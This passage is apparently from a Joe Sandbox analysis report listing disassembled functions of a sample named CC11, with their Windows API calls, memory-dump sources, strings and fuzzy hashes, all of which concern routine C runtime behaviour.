                                                                                                                                                                  • Instruction Fuzzy Hash: 53116DA3E5CB1221F6761139E857B791141EF5C364F2506F4EA6E867DECE6CE8418310
                                                                                                                                                                  APIs
                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A6BF
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A6DE
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A706
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A717
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900298B3,?,?,00000000,00007FF690029B4E,?,?,?,?,?,00007FF690029ADA), ref: 00007FF69002A728
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                  • Opcode ID: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                                                                                                                  • Instruction ID: dd8688bed2fa91b585d41e487b2597ff2ec506bacc46b63a910c6d50682fe892
                                                                                                                                                                  • Opcode Fuzzy Hash: 313936804f2539caa5b411e3780e1aa067584e6fc9dd7d8d0a30b7f4ad6b7a29
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F116D20B0C682A2FA78A33959455796191EF9A3A0F1443B4E83D877DEEE2CF9038704
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                  • Opcode ID: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                                                                                                                  • Instruction ID: 2ae81bc4248d244abe9a45e4bc44f5fc3d06ef8dbb0b98bf6e80129f9962475b
                                                                                                                                                                  • Opcode Fuzzy Hash: 8dbaaab3785cb5cbfef991dcb4b39f74944edf537148ee7de4100f4564720b13
                                                                                                                                                                  • Instruction Fuzzy Hash: AC112A60E4C647A2F978A33D48555BA2682DF5A370F5847B4D93ECA3DEED2CF4038241
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: verbose
                                                                                                                                                                  • API String ID: 3215553584-579935070
                                                                                                                                                                  • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                  • Instruction ID: eb54a1ac6184a59909325f8c75781b4a4b7c8bc66e784d2ab2d15e62ae36a6ef
                                                                                                                                                                  • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                  • Instruction Fuzzy Hash: 8391CF32E08A46A1E7319E39D45037D7395EB44B9AF8841B6DA5DC73D9EF3CE8468304
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                  • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                  • Instruction ID: 5e23132d9c985f3899df5f995a59a8db4605dca690be926f55aa1c8e3b45f56f
                                                                                                                                                                  • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                  • Instruction Fuzzy Hash: 86817F72E08243E5FB744E3DC2902793AA0EB11B88F5580B5DA09D779EDF2DE9439701
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                                                  • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                  • Instruction ID: fb55907f387caae917aad7023664dd6efa0a123574666d35b35858e6805daa08
                                                                                                                                                                  • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                  • Instruction Fuzzy Hash: BB51AD32B19646AADBA4CB25E484E797795EB44B8CF548170EA4EC378CEF7DE841C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                  • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                  • Instruction ID: 794027cd627189bd3dadbf55c10aea86a09c4ba0f4ab54a2f7751203738c363d
                                                                                                                                                                  • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                  • Instruction Fuzzy Hash: AA618332908BC5D6D7719B25E4407AEBBA0FB85798F044265EB9C43B99DF7CE190CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                  • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                  • Instruction ID: 3fd517f166474d67959c88066563b432a082f811e25dd9fb4666c7e2419afad4
                                                                                                                                                                  • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                  • Instruction Fuzzy Hash: 11517F36A08382E6EBB48B31944436C7BA0FB65B98F584176DA5D87BD9CF3CE451CB01
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,?,00007FF69001324C,?,?,00007FF690013964), ref: 00007FF690017642
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                                                  • String ID: %.*s$%s%c$\
                                                                                                                                                                  • API String ID: 4241100979-1685191245
                                                                                                                                                                  • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                  • Instruction ID: c0ecfcf65468bedfb534fe0e40f4d484c8ca3ea1439c6a524bb5eb6e3a5c1f4c
                                                                                                                                                                  • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C31E82171DAC1A5EA719B34E8507EA6265FB88BE8F404271EE6D837CDDF3CD6418700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                  • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                  • API String ID: 1878133881-653037927
                                                                                                                                                                  • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                  • Instruction ID: 33221a58fbb2fdf55098bcd9f466b3ff1a022d4ea694a439cd0533ccf5d5716e
                                                                                                                                                                  • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                  • Instruction Fuzzy Hash: DE116D72628B85A1EA718B20F451BA93364FB48B88F905175EB5D97788DF7CD605C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                  • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                  • API String ID: 1878133881-2698358428
                                                                                                                                                                  • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                  • Instruction ID: e1d9295304c5a4139dc5b94108194141179b88569957d767db62f109107c1a72
                                                                                                                                                                  • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                  • Instruction Fuzzy Hash: 98119A72628B85A1EA718B20F451BA93368FB48B88F901176EB8C97748DF3CD609C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                  • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                  • Instruction ID: c06975508efff32dfaf1af3e4da627690b783b6fe90eb2097004a056e7bc40af
                                                                                                                                                                  • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                  • Instruction Fuzzy Hash: 67D1DF72B18A81A9E721CF79D4402AC37B2FB44B98B1442B6DE5E97B9DDE38D517C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight$_isindst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4170891091-0
                                                                                                                                                                  • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                  • Instruction ID: 0a8b2a5830c00f955093f211534c99cfd1cb67b46a4c02a8bc7aadb920f1aca5
                                                                                                                                                                  • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                  • Instruction Fuzzy Hash: EB51F372F04251AAEF38DB7899456BC2BA1EB14358F110179DE1E92BE9DF38E4038700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2780335769-0
                                                                                                                                                                  • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                  • Instruction ID: fb750d108c2623292a4c426ac6b03a416b45b62ce3830a6e35d10ef0c1786b25
                                                                                                                                                                  • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C517822E086419AFB64CF79D4503BD27A5EF48B98F218575DE0D8BB8DDF38D4828740
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1956198572-0
                                                                                                                                                                  • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                  • Instruction ID: 12af31a49459fafde35b0062c51bb97e609a924e083d0ae66dc763579da81dd5
                                                                                                                                                                  • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                  • Instruction Fuzzy Hash: 1711E521E0814252FAB69B7AE5442B91292EF8CB88F848171EA4D87B8FCD2CD4E18600
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                  • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                  • Instruction ID: 9ca3e75ac5f656dd08f6fd25b59cfb02fb4f2395cf019a7a4db2c09b25091ac1
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                  • Instruction Fuzzy Hash: D5111822B14B059AEB108B70E8542A933A4FB59758F441E31EA6D86BA8EF78D1988340
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: ?
                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                  • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                  • Instruction ID: e1dcb3100f6a0f1517aa93ec2d3608b3295c3d7a10a76c201011125beb336e72
                                                                                                                                                                  • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                  • Instruction Fuzzy Hash: 3241F612A0868266FF369B35D441B7A6790EF84BA4F144275EE5C8ABDDDF3CE481C700
                                                                                                                                                                  APIs
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF69002835E
                                                                                                                                                                    • Part of subcall function 00007FF690029C58: RtlFreeHeap.NTDLL(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C6E
